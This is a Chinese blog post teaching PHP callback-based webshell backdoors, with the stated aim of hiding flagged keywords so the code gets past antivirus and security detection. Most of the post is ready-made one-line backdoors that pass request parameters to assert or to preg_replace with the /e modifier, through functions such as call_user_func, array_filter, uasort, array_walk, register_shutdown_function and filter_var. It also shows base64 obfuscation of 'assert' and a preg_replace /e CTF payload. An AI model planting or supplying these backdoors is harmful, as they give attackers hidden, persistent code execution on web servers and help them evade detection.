RCE入门(常见后门函数介绍)

于 2025-03-30 21:55:12 发布
阅读量610 收藏 27
点赞数 21
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_58456004/article/details/146460063
版权

学习后门函数目的:将被查杀的关键词隐藏起来

通过PHP回调函数(Callback)隐藏恶意代码,绕过安全检测,实现:

  • 命令执行(RCE)

  • 文件操作

  • Webshell持久化

一.区分命令

  • 系统命令:直接执行windows或linux命令
    • 如:system,exec,shell_exec,passthru等
  • 执行代码:
    • eval,assert

二、单参数回调后门

执行命令函数--assert()

后门函数

1.call_user_func(古早)

语法:

call_user_func(callable $callback, mixed ...$args): mixed

 第一个参数 callback 是被调用的回调函数,其余参数是回调函数的参数。

先看一个简单的例子:

call_user_func('assert', $_REQUEST['pass']);

接收参数后相当于

assert($_REQUEST['pass'])

$_REQUEST可以接收GET,POST及cookie的传参。

执行php代码:

 注:PHP 8.0.0 中:asset()函数接收字符串不再被当作代码执行:如果 $assertion 是字符串,会抛出 TypeError。

也可以传入数组:

call_user_func_array('assert', array($_REQUEST['pass']));

ps:这个代码现在会被杀毒软件直接杀掉。

2.array_filter

array_filter(array $array, ?callable $callback = null, int $mode = 0): array

第二个参数作为回调函数。

将数组中的值放到第二个参数中执行

<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_filter($arr, base64_decode($e));

所以第一个参数传命令,第二个参数传执行函数。

将assert转Base64加密

e=YXNzZXJ0&pass=phpinfo()

蚁剑测试连接:

3.array_map

array_map函数也有类似array_filter的效果 

<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'],);
array_map(base64_decode($e), $arr);

 三.双参数回调函数

执行命令函数--assert()

在 PHP 5.4.8 及以上版本中,assert() 函数的签名发生了变化,增加了一个可选参数 description。这一变化使得 assert() 的行为更加灵活,同时也为某些特殊用法(如“回调后门”)提供了可能性。

即asset()可以接受两个参数了。

assert语法:

assert(mixed $assertion, Throwable|string|null $description = null): bool

 后门函数

1.uasort

使用用户定义的比较函数对数组进行排序并保持索引关联

语法:

uasort(array &$array, callable $callback): true

第二个参数是回调函数

<?php
$e = $_REQUEST['e'];
$arr = array('test', $_REQUEST['pass']);
uasort($arr, base64_decode($e));

注: uasort()会将第二个参数放在回调函数的第一个参数位置

2.uksort

使用用户自定义的比较函数对数组中的键名进行排序

语法:

uksort(array &$array, callable $callback): true

与uasort一致,第二个参数是回调函数

用数组对象的方式 使用这两个函数:

<?php
$arr = new ArrayObject(array('test', $_REQUEST['pass']));
$arr->uasort('assert');
<?php
$arr = new ArrayObject(array('test' => 1, $_REQUEST['pass'] => 2));
$arr->uksort('assert');
 3.array_reduce

用回调函数迭代地将数组简化为单一的值(可以实现数组元素的累加和累乘)

语法:

array_reduce(array $array, callable $callback, mixed $initial = null): mixed

回调函数格式:

callback(mixed $carry, mixed $item): mixed 

carry

携带上次迭代的返回值; 如果本次迭代是第一次,那么这个值是 initial。

<?php
$e = $_REQUEST['e'];
$arr = array(1);
array_reduce($arr, $e, $_POST['pass']);
4.array_udiff

用回调函数比较数据来计算数组的差集(可用来比较)

语法:

array_udiff(array $array, array ...$arrays, callable $value_compare_func): array

 传参需要传两个数组

<?
$e = $_REQUEST['e'];
$arr = array($_POST['pass']);
$arr2 = array(1);
array_udiff($arr, $arr2, $e);

四.三参数回调函数

执行命令函数--preg_replace /e模式 

先了解一下preg_replace /e:

e 修饰符的作用是将 preg_replace() 的替换字符串先使用eval()函数执行,然后将执行结果作为替换内容。

注: 由于安全风险,e 修饰符在 PHP 5.5.0 中被弃用,并在 PHP 7.0.0 中移除。

来看一个小例子:

<?php

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}

foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
    @eval($_GET['cmd']);
}

GET传参的键值被用作正则表达式,值被用作被替换函数。

知识点:

  • replacement(替换字符串) 中可以包含后向引用 \\n 或 $n,语法上首选后者。 每个这样的引用将被匹配到的第 n 个捕获子组捕获到的文本替换。所以\\1=${1},用来获取第一个分组。
  • 双引号字符串中,会直接解析并执行变量或表达式(如果 ${} 内部是一个可执行的表达式或函数调用)。变量名必须以 $ 开头。

payload:\S*=${phpinfo()};

解题思路:

用\S*来匹配${phpinfo()};。strtolower("\\1")中的\\1捕获到第一个分组(也就是${phpinfo()};),由于是/e模式,会用eval()函数执行命令,此时会将双引号中的${phpinfo()};解析并执行。

相当于eval(strtolower("${phpinfo()};"))

为什么不用.*来匹配所有字符串?

在php中,.号会被接收为_

后门函数:

1.array_walk

将数组中的每一个值都用回调函数执行一遍

语法:

array_walk(array|object &$array, callable $callback, mixed $arg = null): true

回调函数格式

callback

    典型情况下 callback 接受两个参数。array 参数的值作为第一个,键名作为第二个

arg

    如果提供了可选参数 arg,将被作为第三个参数传递给 callback。

不选第三个参数,可以用assert()双参数来执行,这时需要把键名和值替换位置。

后门代码:

<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk($arr, $e, '');

 相当于

 $e=preg_replace('|.*|e',$_POST['pass'],'');

蚁剑测试:

2.array_walk_recursive

对数组中的每个成员递归地应用用户函数

语法:

array_walk_recursive(array|object &$array, callable $callback, mixed $arg = null): true 

回调函数格式与array_walk一致

后门代码:

<?php
$e = $_REQUEST['e'];
$arr = array($_POST['pass'] => '|.*|e',);
array_walk_recursive($arr, $e, '');
3. mb_ereg_replace(类似preg_replace )

语法:

mb_ereg_replace(string $pattern, string $replacement, string $string, string $options = ?): string

第四个参数option是选择修饰符

这个函数没有回调函数

后门代码:

<?php
mb_ereg_replace('.*', $_REQUEST['pass'], '', 'e');
4.preg_filter(类似preg_replace )

语法:

preg_filter(
    string|array $pattern,
    string|array $replacement,
    string|array $subject,
    int $limit = -1,
    int &$count = null
): string|array|null

没有回调函数

后门代码:

<?php
preg_filter('|.*|e', $_REQUEST['pass'], '');

五.无回显回调后门

ob_start

打开输出控制缓冲

语法:

 ob_start(?callable $callback = null, int $chunk_size = 0, int $flags = PHP_OUTPUT_HANDLER_STDFLAGS): bool

第一个参数为回调函数

回调函数格式:

将输出缓冲区的内容放到回调函数里面执行

但是有执行结果也不在流里,最后输出不了,所以这样的一句话没法用远程连接

可以用来将后门写在其他文件里上传:

六.稍隐蔽的单参数回调后门

1.register_shutdown_function

注册一个 callback ,它会在脚本执行完成或者 exit() 后被调用。

语法:

 register_shutdown_function(callable $callback, mixed ...$args): void

第一个参数为回调函数

后门代码:

<?php
$e = $_REQUEST['e'];
register_shutdown_function($e, $_REQUEST['pass']);

2.register_tick_function

注册给定的 callback,以便在 tick(时钟周期) 被调用时执行。

语法:

 register_tick_function(callable $callback, mixed ...$args): bool

第一个参数为回调函数

后门代码:

<?php
$e = $_REQUEST['e'];
declare(ticks=1);
register_tick_function ($e, $_REQUEST['pass']);

3.filter_var 和filter_var_array

filter_var :

使用特定的过滤器过滤一个变量

语法:

 filter_var(mixed $value, int $filter = FILTER_DEFAULT, array|int $options = 0): mixed

后门代码:

<?php
filter_var($_REQUEST['pass'], FILTER_CALLBACK, array('options' => 'assert'));

filter_var_array:

获取多个变量并且过滤它们

语法:

filter_var_array(array $array, array|int $options = FILTER_DEFAULT, bool $add_empty = true): array|false|null

后门代码:

<?
filter_var_array(array('test' => $_REQUEST['pass']), array('test' => array('filter' => FILTER_CALLBACK, 'options' => 'assert')));

七.其他参数型回调后门

preg_replace_callback

回调函数格式为1、2、3参数的时候,可以利用assert、assert、preg_replace来执行代码。但如果回调函数的格式是其他参数数目,或者参数类型不是简单字符串,怎么办?

php5.5以后建议用preg_replace_callback代替preg_replace的/e模式来处理正则执行替换 ,preg_replace_callback也有回调函数来执行代码。

语法:

preg_replace_callback(
    string|array $pattern,
    callable $callback,
    string|array $subject,
    int $limit = -1,
    int &$count = null,
    int $flags = 0
): string|array|null

回调函数格式:

回调函数接收参数为数组类型,但可以使用匿名函数,接收数组,返回数组中的值

后门代码:

<?php
preg_replace_callback('/.+/i', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);

注:create_function函数已自 PHP 7.2.0 起被废弃,并自 PHP 8.0.0 起被移除。 强烈建议不要依赖本函数。 

类似的函数

<?php
mb_ereg_replace_callback('.+', create_function('$arr', 'return assert($arr[0]);'), $_REQUEST['pass']);

总结:

1.执行一个参数和双参数的函数可以用assert(),三参数可以用preg_replace的/e模式,但是都随着php版本的升级,已经被淘汰了。

2.assert()函数在 PHP 8.0.0 之前,如果 assertion 是 string,将解释为 PHP 代码,并通过 eval() 执行。这种行为在 PHP 7.2.0 中弃用,并在 PHP 8.0.0 中移除

3.preg_replace的/e模式:e 修饰符在 PHP 5.5.0 中被弃用,并在 PHP 7.0.0 中移除。


qq_58456004
关注
网络安全入门到精通(特别篇I):Linux安全事件应急响应之Linux应急响应基础必备技能
HACKONE的博客
04-10 1024
awk 首先将每条日志中的IP抓出来,如日志格式被自定义过,可以 -F 定义分隔符和 print指定列;
Linux设置bypass网卡,Linux pwn入门教程(7)——PIE与bypass思路
weixin_34524593的博客
05-07 1459
作者:Tangerine@SAINTSEC0x00 PIE简介在之前的文章中我们提到过ASLR这一防护技术。由于受到堆栈和libc地址可预测的困扰,ASLR被设计出来并得到广泛应用。因为ASLR技术的出现,攻击者在ROP或者向进程中写数据时不得不先进行leak,或者干脆放弃堆栈,转向bss或者其他地址固定的内存块。而PIE(position-independent executable, 地址无关...
PHP常见后门修复,phpStudy后门RCE,复现/批量脚本/修复
weixin_33416318的博客
03-10 681
phpStudy后门介绍phpStudy是国内一款免费的PHP环境集成包,集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer等多款软件,无需配置即可直接安装使用,有着近百万PHP用户。近日被爆出phpStudy存在RCE后门,并通过验证复现。软件作者声明:phpstudy 2016版PHP5.4存在后门。实际测试官网下载phpstudy2018版php-5.2....
RCE漏洞及绕过
BKN711的博客
08-11 1082
RCE漏洞:远程代码执行和远程命令执行在很多Web应用中,开发人员会使用一些特殊函数,这些函数以一些字符串作为输入,功能是将输入的字符串当作代码或者命令来进行执行。当用户可以控制这些函数的输入时,就产生了RCE漏洞。
php后门木马常用命令分析与防范
米克源码的博客
01-21 806
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite。2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13。//可将php代码存于非php后缀文件,例: x.jpg。
RCE代码及命令执行(详解)
剁椒鱼头没剁椒的博客
12-20 5463
借鉴链接:https://www.cnblogs.com/networkroom/p/16395024.html当然还有很多的其他函数,可以自学百度搜索。在low级别中是接受了用户输入的IP,服务器通过操作性的不同情况执行ping命令,并且Low级别中并未对输入的内容进行过滤。在Medium级别中是对“&&”与“;”进行了过滤,那么这里可以不使用这两个破解符即可,使用别的,比如我之前提到的“|”或者“&”。在High级别中是对“| ”进行过滤了,这里不知道是作者无意间敲了一个空格还是故意的。
栈溢出攻击2——绕过Canary通过后门函数拿到shell
学习记录
09-16 2585
博文中的程序:点击下载 提取码:qbdd   能看到这篇博客,我相信大家对栈溢出攻击已经有了一定的了解。一个入门级的题目就是程序中本身有后门函数,我们用后门函数的入口地址覆盖当前正在执行函数的返回地址,这样当前函数执行结束之后,就会跳到后门函数执行,从而达到攻击的目的。那么我们有没有办法防范这种攻击呢?答案是有的,我们可以不使用像read、scanf等有缓冲区溢出漏洞的函数,当然,如果无法避免这些函数的使用,我们还可以使用canary机制来保护我们的程序。canary的英文名称是金丝雀,它可以用来判断我们
从php入门rce
五分之一世纪
08-06 1572
文章目录(1)什么是rce(2)php中的命令执行(3)php中代码执行的情况(4)一般的过滤方法(5)一般绕过方法 (1)什么是rce RCE(remote command/code execute)。分为远程命令执行ping以及远程代码执行evel。漏洞出现的原因是没有在输入口做输入处理。我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 (2)php中的命
WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘
weixin_45534587的博客
02-09 945
RCE,全称 Remote Code Execution,也就是远程代码执行。简单来说,它是一种非常危险的安全漏洞。正常情况下,我们访问一个网站或者使用某个应用程序,只能按照开发者设定好的功能来操作。但要是存在 RCE 漏洞,攻击者就能打破这种限制,在目标服务器上执行他们自己编写的代码。
万字渗透测试入门知识点,自学查漏补缺
yjwangan的博客
10-24 1248
万字渗透测试入门知识点,自学查漏补缺
PHP常见代码执行后门函数(例如eval和assert)
美奇软件开发工作室
04-23 6228
什么是代码执行: 应用程序在调用一些能够将字符串转换为代码的函数(例如php中的eval中),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。 常见php代码执行函数介绍 常用执行代码函数 1、eval(): <?php @eval($_POST['hacker']); ?> eval函数将接受的字符串当做代码执行 2、 assert(): 用法和 eval()...
PWN 的知识之如何利用栈溢出利用后门函数
2301_80217770的博客
01-06 815
PWN 的知识之如何利用栈溢出利用后门函数
php域名追踪后门_常用php后门网马总结分析
weixin_34611130的博客
03-08 380
php后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢?php后门木马常用的函数大致上可分为四种类型:1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, ...
RCE漏洞
Wacjey的博客
08-11 814
call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组;可变函数:若变量后有括号,该变量会被当做函数名为变量值(前提是该变量值是存在的函数)函数执行;,这个作为参数的函数就是回调函数,回调函数也是一个我们定义的函数,但是不是我们直接来调用的,而是通过另一个函数来调用,这个函数通过接受回调函数的名字和参数来实现对他的调用。call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数;因为有些特殊字符如^?
PHP回调后门小总结
最新发布
2302_78449782的博客
03-27 1193
php精彩的回调后门
创造tips的秘籍——PHP回调后门
m0_63050933的博客
10-31 913
我就自己给这类webshell起了个名字:回调后门
PHP的回调后门
feng的博客
10-17 1129
前言 今天洪学长给我留个了任务,具体的就是关于回调后门这块的内容。我关于回调后门了解的很少很少,以前做南邮的题目遇到过一道三参数回调后门的题目,当时草草了解了一下,理解的不算很深。因此今天去学习了一下回调后门的相关内容。 PHP的回调函数 什么是回调函数? 所谓的回调函数,就是指调用函数时并不是向函数中传递一个标准的变量作为参数,而是将另一个函数作为参数传递到调用的函数中,这个作为参数的函数就是回调函数。通俗的来说,回调函数也是一个我们定义的函数,但是不是我们直接来调用的,而是通过另一个函数来调用的,这个函
web漏洞】代码执行
Mr_atopos的博客
06-17 1079
代码执行,学习笔记
红旗Linux RCE认证详解与常见问题解析
- SSH(Secure Shell)中使用的加密技术包括公钥对称加密(如RSA),这是SSL和PGP中常见的加密手段,选项D(RSA)符合描述。 3. **统一用户管理**: - NIS (Network Information Service) 提供了一个域中所有主机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值